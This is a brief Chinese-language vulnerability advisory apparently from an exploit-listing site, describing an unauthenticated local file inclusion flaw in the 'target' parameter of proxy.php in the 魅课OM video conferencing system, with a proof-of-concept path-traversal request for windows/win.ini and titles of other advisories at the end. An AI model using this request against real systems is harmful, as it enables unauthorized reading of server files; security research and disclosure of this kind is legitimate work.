魅课OM视频会议系统 proxy.php文件target参数存在本地文件包含漏洞。攻击者可借助该漏洞无需登录便可下载任意文件。
登录页面
验证POC
/admin/do/proxy.php?method=get&target=../../../../../../../../../../windows/win.ini
久其财务报表 download.jsp 任意文件读取漏洞 安美数字 酒店宽带运营系统 server_ping.php 远程命令执行漏洞